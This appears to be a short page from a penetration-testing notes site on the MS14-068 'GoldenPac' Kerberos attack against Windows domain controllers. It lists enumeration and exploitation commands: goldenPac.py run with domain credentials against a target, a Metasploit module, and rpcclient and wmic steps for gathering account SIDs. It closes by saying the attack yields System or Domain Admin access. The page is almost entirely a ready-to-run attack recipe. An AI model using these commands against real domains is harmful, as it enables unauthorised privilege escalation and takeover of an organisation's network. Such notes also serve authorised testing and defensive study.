search
githubEdit

GoldenPac MS14-068

hashtag
Enumeration

  • FindSMB2UPTime.py IP

hashtag
Exploitation

  • goldenPac.py -dc-ip DC_IP DOMAIN/USER:'PASSWORD'@TARGET

hashtag
OR

  • rpcclient $> lookupnames NAME

  • auxiliary/admin/kerberos/ms14_068_kerberos_checksum (Metaploit)

  • wmic useraccount get name,sid

hashtag
With this attack, you Pass the Ticket to System/Admin or Domain Admin acces

PreviousCertifried CVE-2022-26923 (Need ADCS to work)NextSamAccountName / NoPac CVE-2021-42287 / CVE-2021-42278

Last updated